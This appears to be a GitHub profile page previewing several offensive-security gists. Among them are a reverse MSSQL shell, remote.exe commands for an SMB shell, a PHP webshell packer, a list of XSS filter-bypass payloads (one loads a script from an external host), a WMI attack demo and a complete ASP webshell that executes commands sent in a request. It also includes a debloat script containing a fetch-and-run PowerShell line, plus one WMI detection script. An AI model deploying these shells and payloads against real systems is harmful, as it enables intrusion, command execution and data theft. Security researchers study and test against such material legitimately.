Skip to content

Instantly share code, notes, and snippets.

View acaetano's full-sized avatar

Ailton Caetano acaetano

15 followers · 12 following
  • São Paulo, Brazil
View GitHub Profile
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@mgeeky
mgeeky / xml-attacks.md
Last active July 27, 2024 02:12
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active August 3, 2024 14:38
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@mattifestation
mattifestation / gist:8ef36782ceb7f73d74cfb00c2a710301
Created November 19, 2016 17:07
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@leonjza
leonjza / pack_shell.py
Created June 16, 2016 19:52
PHP Webshell with Packer
import base64
import sys
import re
SHELL = "<?php eval(base64_decode(\"{shell}\"));"
with open(sys.argv[1]) as f:
source = f.readlines()
source = ''.join(source).replace('\n', '')
source = source.replace('<?php', '')
@alirobe
alirobe / reclaimWindows10.ps1
Last active August 31, 2024 20:27
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
###
###
### UPDATE: For Win 11, I recommend using this tool in place of this script:
### https://christitus.com/windows-tool/
### https://github.com/ChrisTitusTech/winutil
### https://www.youtube.com/watch?v=6UQZ5oQg8XA
### iwr -useb https://christitus.com/win | iex
###
###
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active September 18, 2024 00:14
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@mattifestation
mattifestation / WMI_recon_and_attacks.ps1
Last active April 26, 2023 04:47
BlueHat 2016 - WMI recon and attack demo
#############
### SETUP ###
#############
# Set up remote session
$Credential = Get-Credential TestUser
$AdminCred = Get-Credential Administrator
$SessionOption = New-CimSessionOption -Protocol Dcom
$CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption
$AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption
@mattifestation
mattifestation / WMI_attack_detection.ps1
Last active March 16, 2021 23:02
BlueHat 2016 - WMI attack detection demo
#region Scriptblocks that will execute upon alert trigger
$LateralMovementDetected = {
$Event = $EventArgs.NewEvent
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED)
$MethodName = $Event.MethodName
$Namespace = $Event.Namespace
$Object = $Event.ObjectPath
$User = $Event.User
@ahhh
ahhh / cmd.asp
Last active November 20, 2017 05:23
ASP webshell
<%
szCMD = request("cmd")
Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = Server.CreateObject("Scripting.FileSystemObject").OpenTextFile (szTempFile, 1, False, 0)
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call Server.CreateObject("Scripting.FileSystemObject").DeleteFile(szTempFile, True)
%>